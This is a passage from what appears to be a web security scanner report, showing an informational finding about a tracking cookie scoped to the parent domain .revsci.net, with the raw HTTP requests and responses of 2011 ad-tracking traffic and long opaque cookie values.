rsiPus_YNkt="MLsXtSUNZzhvJpE4W8XcxPALnEt2UCF+EhlrQBOkeAag62g6yEdCljXyZgkx/j61zQwum0PUaXZlScWcHJXqJ+ntF6InTyr8BpCDJkohaLRfx3kUyii0pXWuRIFFGgX4kD52HS5mSxNK9mEK0LUJBBtxfTkHhZQLIVRUk4qoy0+PQpDHW8G6nM6dAiwDf9Y/Qpy8DXnkTiZcQaTJtArlE4rR9GH7nslpGf/cWY2XjgVUrSW2a9S78KYzcgy9tICfu+45H4zHRTkd3qPYXbfsLEr1ZDk9WX1jVLXRfhpZWujUC5qjEoEVo0AH2PZByDLG5SfMse5tVLnRIjqdJX5UxwZsxgQdsBmoSZ1l6c/FYOiIxWgD+jt8FcbS52E9X0jvGjWOBLGvvTV/FVAVYugPtGQs06E+AfDy2OF4VlmW9CD80g5+OvDbEcZRJUOjsHQDONWbB3CTTA549zMo+G2TFXJs1NUlCLwwg6POFn7fAqLb6E9hu5AZWKM5L8QI8HaEDOL68FEOtIkOosk4Wknwqw9o67ojfO7loIXxIlaOhw6pmXCNYR5SnE/IkIZ3ahQUeqbPy7XuSsimFYIvyEmJbjO+7m77DXpuSNNfy3V4CnYvT15QjTJkOsRxQfcuT4cf8wO/nSfDLjD09uuvVRtTDcz8Cf7wz2Ev3oTAPo3b5lq7/SGdYU9OMgu1+7o1fxSlf4LJPpl4L3XbKWd7+8kXNQ/NxjV/PtjRzLJCgDLvqr4StWioEr+Psm1uDraXWPAdzYZh+3bLj4cJaltPnZWkBXxfMW9Jx3UtWMgD3aKjoXp8minCy8Fo6e/ULAiVmtJfKvoLUNHKOgyp2hrztdXG61pPxbZGdhjawkC4FXnLW3JkqmzAvYMzimXeHar2PX7HHr9EJ70ClIWt5imBIwiqvgJ+PcwBQUFDo9wcHt2jmZDN6oqtcT6JnIZrVFTcAJ2RZxkJ0OKtA5RHzfOu+Hrcunzdeu0HdinLKyt1vnCvoRHxCgRkx6GvCUV1kfSS06+7mHW+uozx/IqLA29Uq9dUNQUCRf7iCcIiI3E4Ql/QaxrAdXQa9PrgnGcOBtYtF2XJFYWHSuM2wt9f0If9GB3XxZPTXZiQrzZVlN46Y65sBWOTQOrtVSTOJ7kRJGEWfSN5TxP3ltSSOHJy3DddrLIgfA5TvWsQOK8AYrzMli/i1b6n5NwUbuaVLfnk20l2BbQ7wUTeTgYLdXEZTYGD9GWTMblkKOaibbEpHqS52ln2NGOMiKAzg8T3M7qXz93Zq43NMu8QfXbU4qZyMTXFN7fwMkbUihxVZSxAMAu258JRDDZglbtH/rS7S0Uhdix5cjPw31rqvrIeUtzNmJdqf4L4xw=="; rsi_us_1000000="pUMtIymnMBYY1A2AKVvIkpaWb9R7dyQBcR324/3RXNND3EGSWyN2albAPoCsJfF+wlLklu4Fpq7WSrK/pRNdejEhzzNfE+pD3lAuHGHVp514nWGQnCu6brt5PUw3wq5efZo4vxPionPxKaVGqnId1ihSrjoG2+FwywujxK64ikYeGSUZvctKx+Sc3NOTDuxjoR4MwCfLURDsSUrMHmjA9vUNIj43z3CxSeUxBhJzSBapR1//YG01zjUKlcz/3tMIOzRqWywuPKt7qn3GL9yPmmsQBp1BkGz69uTX3CcKy2OyljHrrefJYuktjD749AS6EZpdQF0iYvabL6flCiMQcDYyIx4tlpCFR6lV7QQ8VrvHvcVF2ZgBlwZfzy7L0brB9FTXEVeq/5G/FluOtDbHdI46B9OIB4r2QOoDW56ASfH84EW5zYq9U/rJCN1c5cp6z0qqudgAbjy62cXdICSPPwWsiaJw6Hom2UdI+ApI6R1w6RuAwMU6Y6I4xta0rPiX9+BbKznIUcAgUCxIgtW3U13iutfgafnUAWLnR2jLNtlYxkT6hbll/faWcYUBesh1OJ9ndKUlon2+TOgkNKL28i9tx8dT+E4dfY/9+BxcQuu6Kqwzf+TEzu5cLawfPiRYx0EBxcABFnp8wGFytr0cTX53QyQxc06vnbILxQaGlIzENm7Xgw8EQYhgOlrysPGLuKG+xFtqYnc4sG72q1dUW85bLRhcFryg2/lekw5bdMHBuB944zKbAl4aKZQ4Z/Hopq43D2St2lB/dF/R8aClBsKke+SOtUVddKniqvrLVs900YQCLT9OYzFt00dJNgaw1uus0Vr0EiNRfAjcAju2zo8fMGKCf74sy/Qe1u6zN7vch1/H6Cds3eX+q1eRrNTYsHe4d3P93Zp7WEmE9V6tD6Pup8UJryE1CORWwiF9RvN+J4Ve8ibwwg3G07uASAwx/nmNBX+TympwelaDVPoCe5vP/0VJciqM2r2WdO0yZt9U7mCaVOj9vjofyg7KjB3KI3a7QQ2+49SyXZmuADytVwDRCaETLlfSXZRF8MTvb5toU2wiKZqhrxkjJAc4R4MzCiNSnTOHqcMa3UmEn3G4ivdxXTdxWP5sG/qV5fxHcgmeXBJoqjRpZ9lgfDFul9J7uAbmc7KJSD0O6XySgnHJhZ9HO3lPwrKGt/yJA35XECSVTsSjPeMSUExIGDqcC5IZJ34E5lYmaoJ4nH8osXserUGPXQbvgDnkXBaBPrAaUUR7r0ColDUQq/l/TmETlkqR//uL/2HfMb5G+4PsyrRdaDF7wfdJkrQsvR3cveighhYyoDlUg7wtxyadfCbbqOLW+d6g9wavihoei1C39Jr38UhhyF92N++4H5TTdlndZO4F+YaafYYUtyb4AYS5MNiK/9nThgn0VY2Yf8sLYLr/rveftJmDjbDD8a6jfUqnD0I0RqBY5kq/aNRyuv5jNIAkt7A7JSXjp778FSk6RPyretYORzWwjaA1UUKCNcpdEG/dXbPPHybOBGItHXncuyM3RRQFXEhlhy0u4Duzigz3hBM5bnnR5MF5cVbzDupb4MHkAoaD1jq6wab8oX04dtg+3zRKAQMMYrA/jyp1dhOMZN8qZvcQ2i4TILoXkopIHMULStNO5mrqs9JROrvCHK00SUP6dwtBl4vvHUeIW2JNVfX6WJmJnY7dqEAhzP6z0a9Nd8NcBnDAsXCwwybT2zqvRGzVOK/v6IVmDA+7Zv8DClK/JMITgcvpDw=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhunIMpzaBv3Bh9+zs22rMriQJC32dXLnKG/pV+zq2jLxL9x1pNHcD2ocpIiv/mxMD/xw6JhTycr5wS4UUa4TNPNDPv1QWh8gkmOOsH9rraddoccklFuNdzYOTGbveI5B67GeW6vKDhf8x1zrSc6gCzrFbMIKhTTdRqoKlX/oPK//kr2kQXuR24z1Xd5Epy8Nuvh2Xbn/ZbdhDQ6jgMBVM4H5qcXSe48t8PK3WeogQhMe7wl3Gx0bUAFLRvIqc1ZCBGcncieS3sVyrE1RLjHPZUTwqJcfs27xK6WCdqQtvWy5/QZdujY05tSt9al9cxR7yLPnpwCECgSh9J3f2PSBV1F1ilMlUM/FYb2bAgdxDGVq4QKVO4SoRayrPmoaXCy+laCBm0IwcCpvZlzQmWS1JV3pld1LbO5129EmYa/TvHtTvUl6kLt48oxwSV2ajuj8clTHkylvMsWS37WmwspyTGknX1DQ0JeGvplrq7PJXM6cfBurV73XhiwlAQJRtqQQSYuSOCeSV93O9SWUbhRILfD6xrK3er59aKKo8MZRX9RNg0UPsgisu/EFFJZVo7seFL8MD3Mm3U5eTo8V9KBPj6dHnvLPv5CC7ocsFSGS7hR7hVk2HtO5Er19800fKgv7vAVmWfvKBAz/SaQg8ySDMxIHoQqQ=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 12:05:15 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 12:05:14 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.135. http://pix04.revsci.net/I10985/b3/0/3/1008211/235290478.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/235290478.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwfrETCDRfrnhu4IU3vheM/Ns0vAjloMpK61ewq2/t7wxEnZxc6hXo2Tdpd3/peMQJM7SPf8uGKsMu/NnIXoCKOuMJ7ElYQvOVL9t9SMAV/7PjSKU8ZyX7SbtvP/rThYhMvIG0vXZtjIxxqeI8d5ivzt6ti+VgklbAkcGFmgFF55zOhLtGNteye5yii13Q4OdeSFKbr5jiaqKgvgvBJdkXGm510JiYUad7XLzduZCr/JxqLNImhq46QiBAaz+//8WqGERGMitWz+x0mmzhlaVCaVmYgGOu46YSaKRUQ0m04HBV+KheQbSZlO5VtneOe+StGD9+RalRkrNLXKEMvqW6SsMTBCG1D23sVtFUKOWM85Cnas1iHQaGKvNWNbdqHjM7TW4vZKHdpJ1KXdLpe1PQ72hrFn/8I2DKcTrIFCkopzHCkkdlSH/12pK3/BLhkQsrZH5FpXMV5z7hZpF/VfEDWXZ5TRm0IlbP8z1KB5y9zBus/K4s6INaHh4ssltHk7xsqAU4HQyLZuiOWyBijKhvPh+q+HMu+4V9pewc+aosfPpiUVrT5/IXE8TaK+asU5xfX/5RECzSnBWhBiMHG/JhpNGkSgZl9KYAvHyF+m4l70RCkw2yK0lsDhW; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:12:35 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/235290478.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_D9lG="MLsXtSMNJjhvJZE469KkOkhRwa7hUMAPxrf6hJozRd8Z+A+35M/kwpfxR3whtWkMyxtyYOvGoBpIcccljoPMhFn371MBxSEmM2ZUkHaipjVw1j+2Q3LO8RUiZEMx+JyoAXNHMbYhwjxTduP/GnQmKXbM1/6YCHcDX+PXlabqU7/JgU59UpelM8jNfA8ehAGNzIb7MPob4Mkosylkv9WFf3FYqLNEgQceQqMqHncmBdVUo+aMLOvUnNUsY74QZib5JnwmphJrJvTFk1cQludfyHkHTPDH6SJjFLgsahQeFCX3hn6q4Mn0pnLsGNF1OMQCHkPsfOLMCrOLiEXwB7USi4aNSHUY3TJy0ZbWKe/BU5w/Z9nhfr/Ft6njYVTUtKLMv363VYmUCX1/VRsOeB/a0+Nh7jLrbdrB0OY1wQ51YOzG32mIxyawgGWwG0Aj1j4N8KRb9CicpnV8ANcTd1icA2wAQAvkKCt3tiDNuqN8X6DWY6hWXabDNpWSbRO2jlsbRMPqx7Ur8WFj9sYPt8DNc2/axuMnFHdqQpiL4Hdn8cZcLAOwMm+JczgcjqQB8in9THyegCXGEi/OsjeCJmTPMGFatSBajfJVTo1kpQi15M1helSy1W0HTIY1erqMVnEDnqeENDU7ufTgFMRm7y93aqhUT8Zv3b3kx6exW0QHw7MTvvw5wjVTQyUc95Bug2EFRiURtTgS4OwIlG5dCpVUWRoLgp4p1P2KazIX1bWjGl7GYq1XxWhecjOGNdaIJxypG9nENRuQ6yCvGPCQNH9vw4XFc/PfUsg2SNHPXeg+YAz2ZmdfXRjWC8+mqm3bj/a5V7hGnbxkb7vf/cp7xRqzVJj1vokZdTo3CkM7YEZbWypb5y3EeWTbX8YgNM+2HrzKGYakPvWmih1sepksVs+7PY00Hw1RCRZOLQYiNVQbx5RJHqwjSF4VB0ae7egzIR2POxhMZ+ksRNfT+tg81xhD7XOKFCfLYoOUypChDXZ+BVQEyLsgNcF7CbpmI0A8m8UP0K+rkvY1u4i++YFPQ3VY7LYMJz5ZPvU1N89LTqOqbNUndLlEDf4iiMI8N0rnsoTILNP+pv290kNmw9pAaJsmjdWEpaCZ8r2xUDmIhAFZA0hrz82ml0bFd7Fr1i+lwM1CxPhME1FstS4+Q/kHA/ZJ6hbOMuWvJQ5na3NxePINXRhE1NV0HJqKTyVC2uS3fjYKQep51BGpVhaWhLhD2kG23kRJdid37BD3Gg4WwejJTugAcUQtacbdg/vFWJH+PZrKkMeSSPf74OK1SI3b4/o23sooQC94NfJe7ybxeuhm4fQRY31M6xKA56x/AfmSTG7SqQGLd/SKIJrtrYMyVq6wVUJZ1vI="; rsi_us_1000000="pUM14zlHMBYUrmdq3jPYy+fvNkbarDOrNPMu8ouLfPSa7vK/BcXyJ6ss6K7NQyV29PiorQVEulRZ4tnPJ+HkCNkV7otr3jarEffdbc9/za4G2QiQlpTv2oVz+pbm3ji4qQ3jNiGBq1TpyJwf6PZQJWVYz/Y3RM2avV/gr4gWBBhn1FlMpjPfV9KHWpZjs3Y2UxE4dpcWl6GPZPEHLqLCf3cgsdcaos7UNY3rTS0ZJQqSWG0qmeFBWn4e1P7/3/M4N1QqGywm/Kj6qn3Gr9yz+rl5LZDAEGza9uQXhGbD0PFC2FGgTBco9o951itftAN91OkJB5DryGLo6TzsCkOuKNwy+zqtXO9w2v2Xgiv5OKSdL+gsqoo3L8t7KNxdRgVAaBE55UDWva0eg5XmQ3G9nEJHXGsLuIqhCzg3bNwR31UKA/aL1NIEnuTdyCi6VWMaJNOX4906ijTf03+RJdxqYGV5vbvndggdFWteWeJQIfJ0fMum2uFlSDYj41iVbl6SWe44/R0UOW3wyhHrOIhlw7nKRc262p7QI32tKRDPFMaxhYxVcI4lNDopRcGCZn1NFhcxdrjdrHQgs8YUJCIRRMMMjJP13Xu2JCZa7tvJaAV1Nug0p0o2YHgKZOGAM0+t+Ahw9OSqG1piJ38cqcd1Y/cm16s0vMqqFWZYn1sSLi+RhfBV5BSDUiWgQLAgoT+vLU8Xp/icy+xb8nsmTYuO+Z6EPw+2OIEy+L9EKVl3/LLE6sfjBDRKAQzCnLOgR/FpWzpTpIUZqgardDX6vRHNuQZWRbawgLYmJccd9lGQXnNrALh3E7VbTyT9rFknOQxAEOvASjXXAtopfVhGeUsFwM923tMGbMUsb+PUBecTuF7c3UA9MZGvdJ9gZJCqUW4hAWPhRWZZaZfyUkkUr5UdBiBlLI7NWaebk65a0YqihhdSFBW6xXag0B5GKQJK1sWDr1sg2nlNw7qzsouFlwV0ccv027CCzNZTyrQrV/Gg+ga5XGrPRnAQXj1xYX2kobHjjb28I4McUB7lTcWJHXuvpbQs6qk0sGGCL2Qm2G7jocOOpBHUBUB2HhPc31J7OThksnfG6M3RiPtJLvOhujGBr6UTvjAL74nI7+KoRU19YqMYg7ESLq6OHwPK5PylaaUT2NswpzKUO/j289Pl+UrnC2vsOqmgAJD7w+hGM2u8zngdslVpSCpHA5fTovGFZvfGddBpNWN3HJ12f7yfEbeHiLEud0aceDyuv/3YnAxjA3lZ6yxFkzEQo4vvvUYwyJPkG3LhIRXFIMuP8DY2kwD2rMrHIMMJ3HoGb6bLlTEPKSh1R4fFuJq7oJrYJqpWDnPDJiDO56/MXqyBiWP5ZlV13W9EQSbPkptKr05/l1v+XdkRrtKY6tb0Z4QWMAuv1QURar7zhVOgRG5Uitdi0P01ayIAvaX/DmOMKol8Q4IBbOY2j6r+UGtqxhjPh51T7rH9aCbAy4Lo2ZtueYSKTE7VS36vSfGiQRYAbPHZriYCjNGhHNAS7jn7vACKHvbdfZpAs8Pt8o8wpjCN+nX8GTIMjMqpOa92D4NsOgL0DGtKNM/JYKbG8+iXdwiTUIiIGHVd7V4Sv0nzcUCDTHDCT08uzuiVlQ6ErjikbyhdRdEHO4h2eOrh5ChLMF9eTUY13yR4xsEpvWQsX6A3ba9HG9mD4pI6lSQ2H/YBsCxU8rf26W9j5CNJh+M5pYtRebY577BeSCBEGnvMkOGjL/H9x8w8yY0F6FXNvL92Uklc67eGro98OBw0MaSOsEXU8LDA1ZFzgUoQgQ=="; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54egzBWSJbEl9R/Hk7emp9CxqGU21BjlvfqFEzHuAYf/LXNxb/hou/qe5Z5QxgkobZKpf/qECQkjZ2xfizYtjzcYEWuk4FbNoclJQX98N04uriLW0G8StnjPT+W6oAbwx3bHwdFtYZLF90y5CvSa63/fztWb0tOFBEtrJKtc9WLdXNDp5Yk8JuCrco7FVu/rIuLaa7y5IxxiMFGfJphX5SQkbl8KbAvHUlwlRs0JQoL9Knk1fBze/

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
